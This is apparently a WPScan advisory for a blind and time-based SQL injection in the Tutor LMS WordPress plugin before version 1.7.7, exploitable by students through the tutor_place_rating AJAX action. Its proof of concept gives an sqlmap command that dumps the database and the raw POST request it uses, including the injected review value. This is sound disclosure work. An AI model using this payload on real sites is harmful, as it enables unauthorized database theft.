WordPress Plugin Vulnerabilities
Tutor LMS < 1.7.7 - SQL Injection via tutor_place_rating
Description
The tutor_place_rating AJAX action from the plugin was vulnerable to blind and time based SQL injections that could be exploited by students.
Proof of Concept
python3 sqlmap.py -r ~/tutor2.txt --dbms=mysql --technique=B -p course_id --dump Where tutor2.txt is POST /wp-admin/admin-ajax.php HTTP/1.1 Host: [URL] Content-Length: 69 Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: [URL] Referer: [URL]/courses/first-class/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: [STUDENTCOOKIES] Connection: close course_id=26&rating=5&review=%3B'&action=tutor_place_rating
Affects Plugins
Fixed in 1.7.7 References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-03-15 (about 3 years ago)
Added
2021-03-15 (about 3 years ago)
Last Updated
2021-03-20 (about 3 years ago)
WPScan 